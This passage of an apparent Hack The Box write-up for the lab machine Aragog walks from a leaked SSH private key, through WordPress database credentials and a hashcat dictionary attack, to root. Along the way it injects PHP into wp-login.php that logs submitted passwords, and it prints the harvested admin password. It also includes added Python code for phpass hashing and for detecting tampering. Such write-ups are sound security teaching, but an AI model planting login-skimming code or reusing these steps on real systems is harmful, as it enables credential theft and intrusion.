/home/florian/.hushlogin
----------------------
/home/florian/.ICEauthority
[binary: ICE/XSMP session entries carrying MIT-MAGIC-COOKIE-1 cookies for aragog, aragog.htb and ubuntu; not reproduced]
----------------------
/home/florian/.mysql_history
PuTTYPuTTYPuTTYPuTTY
----------------------
/home/florian/.nc_history
----------------------
/home/florian/.profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin directories
PATH="$HOME/bin:$HOME/.local/bin:$PATH"
----------------------
/home/florian/.viminfo
----------------------
/home/florian/.vimrc
----------------------
/home/florian/.wget-hsts
----------------------
/home/florian/.Xauthority
[binary: MIT-MAGIC-COOKIE-1 entries for displays on aragog and aragog.htb; not reproduced]
----------------------
/home/florian/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnQNC2Y4/vyAtmQGMn8lwLmCawjbX608ffCO8sAdoUyZ/uPh35hAQxsSD7KOPr/JvEkCwXyXaRSF+Tnot2mYLeZ/+w7iuian042SX1Hhy7k4Hl5/yUCM6Drt3FYijvtJOphmtZRWdDifx0obhNv/Prv6BPRH2UP1zQ+FnBGwVCPxooUWfVHUHyf397U8HQAnzU8/EJzdGlUl3BurwEtmtVco2yD5IFR1sFlzesELzUqV7YIH4jHz0dDd14EIvcSlFehhVBngS4KwOjtSULxhKgQGBXHgiBAJbHfi1cKZ7lwlr9Ql13guSy3jDiym1gwfPOyGZQOuSsMkOrqiUvgXIr florian@aragog.htb
----------------------
/home/florian/.ssh/known_hosts
----------------------
/home/florian/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA50DQtmOP78gLZkBjJ/JcC5gmsI21+tPH3wjvLAHaFMmf7j4d
+YQEMbEg+yjj6/ybxJAsF8l2kUhfk56LdpmC3mf/sO4romp9ONkl9R4cu5OB5ef8
lAjOg67dxWIo77STqYZrWUVnQ4n8dKG4Tb/z67+gT0R9lD9c0PhZwRsFQj8aKFFn
1R1B8n9/e1PB0AJ81PPxCc3RpVJdwbq8BLZrVXKNsg+SBUdbBZc3rBC81Kle2CB+
Ix89HQ3deBCL3EpRXoYVQZ4EuCsDo7UlC8YSoEBgVx4IgQCWx34tXCme5cJa/UJd
d4Lkst4w4sptYMHzzshmUDrkrDJDq6olL4FyKwIDAQABAoIBAAxwMwmsX0CRbPOK
AQtUANlqzKHwbVpZa8W2UE74poc5tQ12b9xM2oDluxVnRKMbyjEPZB+/aU41K1bg
TzYI2b4mr90PYm9w9N1K6Ly/auI38+Ouz6oSszDoBeuo9PS3rL2QilOZ5Qz/7gFD
9YrRCUij3PaGg46mvdJLmWBGmMjQS+ZJ7w1ouqsIANypMay2t45v2Ak+SDhl/SDb
/oBJFfnOpXNtQfJZZknOGY3SlCWHTgMCyYJtjMCW2Sh2wxiQSBC8C3p1iKWgyaSV
0qH/3gt7RXd1F3vdvACeuMmjjjARd+LNfsaiu714meDiwif27Knqun4NQ+2x8JA1
sWmBdcECgYEA836Z4ocK0GM7akW09wC7PkvjAweILyq4izvYZg+88Rei0k411lTV
Uahyd7ojN6McSd6foNeRjmqckrKOmCq2hVOXYIWCGxRIIj5WflyynPGhDdMCQtIH
zCr9VrMFc7WCCD+C7nw2YzTrvYByns/Cv+uHRBLe3S4k0KNiUCWmuYsCgYEA8yFE
rV5bD+XI/iOtlUrbKPRyuFVUtPLZ6UPuunLKG4wgsGsiVITYiRhEiHdBjHK8GmYE
tkfFzslrt+cjbWNVcJuXeA6b8Pala7fDp8lBymi8KGnsWlkdQh/5Ew7KRcvWS5q3
HML6ac06Ur2V0ylt1hGh/A4r4YNKgejQ1CcO/eECgYEAk02wjKEDgsO1avoWmyL/
I5XHFMsWsOoYUGr44+17cSLKZo3X9fzGPCs6bIHX0k3DzFB4o1YmAVEvvXN13kpg
ttG2DzdVWUpwxP6PVsx/ZYCr3PAdOw1SmEodjriogLJ6osDBVcMhJ+0Y/EBblwW7
HF3BLAZ6erXyoaFl1XShozcCgYBuS+JfEBYZkTHscP0XZD0mSDce/r8N07odw46y
kM61To2p2wBY/WdKUnMMwaU/9PD2vN9YXhkTpXazmC0PO+gPzNYbRe1ilFIZGuWs
4XVyQK9TWjI6DoFidSTGi4ghv8Y4yDhX2PBHPS4/SPiGMh485gTpVvh7Ntd/NcI+
7HU1oQKBgQCzVl/pMQDI2pKVBlM6egi70ab6+Bsg2U20fcgzc2Mfsl0Ib5T7PzQ3
daPxRgjh3CttZYdyuTK3wxv1n5FauSngLljrKYXb7xQfzMyO0C7bE5Rj8SBaXoqv
uMQ76WKnl3DkzGREM4fUgoFnGp8fNEZl5ioXfxPiH/Xl5nStkQ0rTA==
-----END RSA PRIVATE KEY-----
----------------------
/home/florian/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnQNC2Y4/vyAtmQGMn8lwLmCawjbX608ffCO8sAdoUyZ/uPh35hAQxsSD7KOPr/JvEkCwXyXaRSF+Tnot2mYLeZ/+w7iuian042SX1Hhy7k4Hl5/yUCM6Drt3FYijvtJOphmtZRWdDifx0obhNv/Prv6BPRH2UP1zQ+FnBGwVCPxooUWfVHUHyf397U8HQAnzU8/EJzdGlUl3BurwEtmtVco2yD5IFR1sFlzesELzUqV7YIH4jHz0dDd14EIvcSlFehhVBngS4KwOjtSULxhKgQGBXHgiBAJbHfi1cKZ7lwlr9Ql13guSy3jDiym1gwfPOyGZQOuSsMkOrqiUvgXIr florian@aragog.htb
----------------------
/home/florian/.zsh_history
----------------------
/home/florian/.zshrc
----------------------
/home/florian/.kshrc
----------------------
/home/florian/.mailrc
----------------------
/home/florian/.lastlogin
----------------------
/home/florian/.login
----------------------
/home/florian/.cshrc
----------------------
/home/cliff/.bash_history
----------------------
/home/cliff/.bash_logout
----------------------
/home/cliff/.bashrc
----------------------
/home/cliff/.gdb_history
----------------------
/home/cliff/.gdbinit
----------------------
/home/cliff/.hushlogin
----------------------
/home/cliff/.ICEauthority
----------------------
/home/cliff/.mysql_history
----------------------
/home/cliff/.nc_history
----------------------
/home/cliff/.profile
----------------------
/home/cliff/.viminfo
----------------------
/home/cliff/.vimrc
----------------------
/home/cliff/.wget-hsts
----------------------
/home/cliff/.Xauthority
----------------------
/home/cliff/.ssh/authorized_keys
----------------------
/home/cliff/.ssh/known_hosts
----------------------
/home/cliff/.ssh/id_rsa
----------------------
/home/cliff/.ssh/id_rsa.pub
----------------------
/home/cliff/.zsh_history
----------------------
/home/cliff/.zshrc
----------------------
/home/cliff/.kshrc
----------------------
/home/cliff/.mailrc
----------------------
/home/cliff/.lastlogin
----------------------
/home/cliff/.login
----------------------
/home/cliff/.cshrc
----------------------

Florian's private key is available.

User flag

We save florian's private key to a file.

u505@naos:~/HTB/Machines/Aragog$ ./filescontent.sh /home/florian/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA50DQtmOP78gLZkBjJ/JcC5gmsI21+tPH3wjvLAHaFMmf7j4d
+YQEMbEg+yjj6/ybxJAsF8l2kUhfk56LdpmC3mf/sO4romp9ONkl9R4cu5OB5ef8
...
7HU1oQKBgQCzVl/pMQDI2pKVBlM6egi70ab6+Bsg2U20fcgzc2Mfsl0Ib5T7PzQ3
daPxRgjh3CttZYdyuTK3wxv1n5FauSngLljrKYXb7xQfzMyO0C7bE5Rj8SBaXoqv
uMQ76WKnl3DkzGREM4fUgoFnGp8fNEZl5ioXfxPiH/Xl5nStkQ0rTA==
-----END RSA PRIVATE KEY-----
u505@naos:~/HTB/Machines/Aragog$ ./filescontent.sh /home/florian/.ssh/id_rsa > florian.key
u505@naos:~/HTB/Machines/Aragog$ chmod 600 florian.key
u505@naos:~/HTB/Machines/Aragog$ ssh -i florian.key florian@aragog
Last login: Fri Jan 12 13:56:45 2018 from 10.10.14.3
florian@aragog:~$ whoami
florian
florian@aragog:~$ cat user.txt
<USER_FLAG>

Privilege escalation

Enumeration tools

u505@naos:~/HTB/Machines/Aragog$ scp -i florian.key /opt/utils/LinEnum/LinEnum.sh florian@aragog:/home/florian/
LinEnum.sh                                    100%   46KB 379.9KB/s   00:00
u505@naos:~/HTB/Machines/Aragog$ scp -i florian.key /opt/utils/pspy/pspy64 florian@aragog:/home/florian/
pspy64                                        100% 3006KB   6.2MB/s   00:00

WordPress

In the Apache web root there is a dev_wiki folder that we did not enumerate before.

florian@aragog:/var/www/html$ ls -ltr
total 24
-rw-r--r-- 1 www-data www-data 11321 Dec 18  2017 index.html
drw-r--r-- 5 cliff    cliff     4096 Dec 20  2017 zz_backup
-rw-r--r-- 1 www-data www-data   689 Dec 21  2017 hosts.php
drwxrwxrwx 5 cliff    cliff     4096 Jan 18 09:50 dev_wiki

Aragog05.png

It is a WordPress site.

Database access

From the WordPress config file, the database access credentials are retrieved.

florian@aragog:/var/www/html/dev_wiki$ cat wp-config.php | grep DB
define('DB_NAME', 'wp_wiki');
define('DB_USER', 'root');
define('DB_PASSWORD', '$@y6CHJ^$#5c37j$#6h');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', );

We log into MySQL with them.

florian@aragog:/var/www/html/dev_wiki$ mysql -p -u root
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 62
Server version: 5.7.20-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wp_wiki            |
+--------------------+
5 rows in set (0.02 sec)

mysql> use wp_wiki
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wp_wiki     |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email      | user_url | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
|  1 | Administrator | $P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu. | administrator | it@megacorp.com |          | 2017-12-20 23:26:04 |                     |           0 | Administrator |
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
1 row in set (0.00 sec)

mysql> quit
Bye

Search for the hashcat mode.

u505@naos:~/HTB/Machines/Aragog$ hashcat --example-hashes  | grep -B1 -A 2 php
MODE: 400
TYPE: phpass
HASH: $P$946647711V1klyitUYhtB8Yw5DMA/w.
PASS: hashcat
u505@naos:~/HTB/Machines/Aragog$ cat wphash
$P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu.

Run hashcat against the hash.

u505@naos:~/HTB/Machines/Aragog$ hashcat -m 400 wphash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.1.1) starting...
...
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: phpass
Hash.Target......: $P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu.
Time.Started.....: Sun Jan 17 11:20:41 2021 (1 min, 15 secs)
Time.Estimated...: Sun Jan 17 11:21:56 2021 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   190.3 kH/s (6.58ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7936-8192
Candidates.#1....: $HEX[2321676f7468] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 73c Util:100% Core:1202MHz Mem:2505MHz Bus:16

Started: Sun Jan 17 11:20:37 2021 Stopped: Sun Jan 17 11:21:57 2021

Unfortunately, the password is not in the rockyou.txt dictionary.
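To see what hashcat mode 400 is actually computing, here is an added Python implementation of the phpass "portable" hash that WordPress stores in wp_users.user_pass (this is example code written for this page, not from the writeup); it is checked against hashcat's own example hash shown above, and includes the same kind of dictionary check that came back "Exhausted" against rockyou.

```python
import hashlib
import hmac

# Added example, not code from the writeup: the phpass portable hash behind
# WordPress '$P$' password hashes, i.e. what 'hashcat -m 400' attacks.
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

def _encode64(data):
    """phpass' own base64 variant (not RFC 4648): 16 input bytes -> 22 chars."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)

def phpass_hash(password, setting):
    """Recompute a $P$/$H$ hash from its 12-char prefix: '$P$', one cost
    character and an 8-byte salt. The cost character's index in ITOA64 is
    log2 of the MD5 iteration count ('B' -> 2**13 = 8192, as hashcat showed)."""
    if setting[:3] not in ('$P$', '$H$'):
        raise ValueError('not a phpass hash')
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30 or len(setting) < 12:
        raise ValueError('malformed phpass setting')
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest)

def phpass_verify(password, stored):
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)

def crack_from_list(stored, candidates):
    """Dictionary check as hashcat ran it; None corresponds to 'Exhausted'."""
    return next((c for c in candidates if phpass_verify(c, stored)), None)
```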

Cron jobs

pspy shows two different scheduled jobs.

2021/01/17 08:24:01 CMD: UID=1001 PID=7401   | /usr/bin/python /home/cliff/wp-login.py
2021/01/17 08:24:01 CMD: UID=1001 PID=7400   | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2021/01/17 08:24:01 CMD: UID=0    PID=7399   | /usr/sbin/CRON -f
2021/01/17 08:24:01 CMD: UID=1001 PID=7402   | /usr/bin/python /home/cliff/wp-login.py
2021/01/17 08:24:01 CMD: UID=1001 PID=7404   | /usr/bin/python /home/cliff/wp-login.py
2021/01/17 08:24:01 CMD: UID=1001 PID=7405   | uname -p

Every minute, the Python script /home/cliff/wp-login.py is run as UID 1001.

2021/01/17 08:30:01 CMD: UID=0    PID=7456   | rm -rf /var/www/html/dev_wiki/
2021/01/17 08:30:01 CMD: UID=0    PID=7455   | /bin/bash /root/restore.sh
2021/01/17 08:30:01 CMD: UID=0    PID=7457   | cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
2021/01/17 08:30:01 CMD: UID=0    PID=7462   | chown -R cliff:cliff /var/www/html/dev_wiki/
2021/01/17 08:30:01 CMD: UID=0    PID=7463   | chmod -R 777 /var/www/html/dev_wiki/

Every 5 minutes the script /root/restore.sh runs as root: it deletes the wiki folder, copies zz_backup back over it, and makes the whole tree world-writable (chmod -R 777).

Intercept wiki credentials

We have write access to the WordPress source code (dev_wiki is world-writable). We can add a few lines to wp-login.php that save the $_REQUEST parameters to a file. In a real engagement we would have to wait until someone logs in to the page; here we assume that the wp-login.py script is a scripted simulation of a user login.

florian@aragog:/var/www/html/dev_wiki$ head -n 30 wp-login.php
<?php
/**
 * WordPress User Page
 *
 * Handles authentication, registering, resetting passwords, forgot password,
 * and other user handling.
 *
 * @package WordPress
 */

/** Make sure that the WordPress bootstrap has run before continuing. */
require( dirname(__FILE__) . '/wp-load.php' );

$req_dump = print_r($_REQUEST, TRUE);
$fp = fopen('/tmp/request.txt', 'a');
fwrite($fp, $req_dump);
fclose($fp);

// Redirect to https login if forced to use SSL
if ( force_ssl_admin() && ! is_ssl() ) {
	if ( 0 === strpos($_SERVER['REQUEST_URI'], 'http') ) {
		wp_redirect( set_url_scheme( $_SERVER['REQUEST_URI'], 'https' ) );
		exit();
	} else {
		wp_redirect( 'https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] );
		exit();
	}
}
/**

If someone accesses the wp-login.php page, the parameters are written to the file. We try it ourselves and catch our own failed credentials. The backup is restored every 5 minutes, so we need to intercept the user's password before the cron job reverts our changes.

Aragog06.png

florian@aragog:/var/www/html/dev_wiki$ cat /tmp/request.txt
Array
(
    [log] => u505
    [pwd] => u505
    [wp-submit] => Log In
    [redirect_to] => http://aragog/dev_wiki/wp-admin/
    [testcookie] => 1
)

After one minute, when wp-login.py runs, a second request is captured.

florian@aragog:/var/www/html/dev_wiki$ cat /tmp/request.txt
Array
(
    [log] => u505
    [pwd] => u505
    [wp-submit] => Log In
    [redirect_to] => http://aragog/dev_wiki/wp-admin/
    [testcookie] => 1
)
Array
(
    [pwd] => !KRgYs(JFO!&MTr)lf
    [wp-submit] => Log In
    [testcookie] => 1
    [log] => Administrator
    [redirect_to] => http://127.0.0.1/dev_wiki/wp-admin/
)

The administrator password of WordPress is intercepted.
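From the defender's side, the weak spot above is that /root/restore.sh wipes dev_wiki every 5 minutes without looking at it (destroying the evidence of the tampered wp-login.php) and then makes the whole tree world-writable again. The following added Python example, which is not from the writeup and uses hypothetical helper names, diffs the live tree against the pristine zz_backup and flags world-writable directories; the sample tree it builds is constructed in a temporary directory.

```python
import hashlib
import os
import tempfile
# Added example with hypothetical helper names; not code from the writeup or the box.

def _file_digests(root):
    """Map each regular file under root (relative path) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:
                digests[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def diff_against_backup(backup_dir, live_dir):
    """What changed in the live site relative to the pristine copy. A blind
    'rm -rf ...; cp -R ...' restore like /root/restore.sh throws this evidence away."""
    good, live = _file_digests(backup_dir), _file_digests(live_dir)
    return {
        'modified': sorted(p for p in good if p in live and live[p] != good[p]),
        'added': sorted(p for p in live if p not in good),
        'missing': sorted(p for p in good if p not in live),
    }

def world_writable_dirs(root):
    """Directories with the o+w bit set (what 'chmod -R 777' leaves behind)."""
    return sorted(os.path.relpath(d, root) for d, _, _ in os.walk(root)
                  if os.stat(d).st_mode & 0o002)

def build_demo():
    """Constructed sample tree: a clean zz_backup, and a dev_wiki whose
    wp-login.php carries the $_REQUEST dump from the writeup plus a stray file."""
    base = tempfile.mkdtemp()
    backup = os.path.join(base, 'zz_backup')
    live = os.path.join(base, 'dev_wiki')
    login = "<?php\nrequire( dirname(__FILE__) . '/wp-load.php' );\n"
    for d in (backup, live):
        os.makedirs(d, mode=0o755)
        with open(os.path.join(d, 'wp-load.php'), 'w') as fh:
            fh.write("<?php // bootstrap\n")
    with open(os.path.join(backup, 'wp-login.php'), 'w') as fh:
        fh.write(login)
    with open(os.path.join(live, 'wp-login.php'), 'w') as fh:
        fh.write(login + "$fp = fopen('/tmp/request.txt', 'a'); fwrite($fp, print_r($_REQUEST, TRUE));\n")
    with open(os.path.join(live, 'extra.php'), 'w') as fh:
        fh.write("<?php // file not present in the backup\n")
    os.chmod(live, 0o777)  # mimic the restore job's chmod -R 777
    return backup, live
```

Run this from the restore job before the rm -rf and the tampered wp-login.php shows up under 'modified' instead of silently disappearing.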

Root flag

The WordPress password has been reused for the root account.

florian@aragog:/var/www/html/dev_wiki$ su -
Password:
root@aragog:~# whoami
root
root@aragog:~# cat root.txt
<ROOT_FLAG>

References

Daniel Simao 20:51, 17 January 2021 (EST)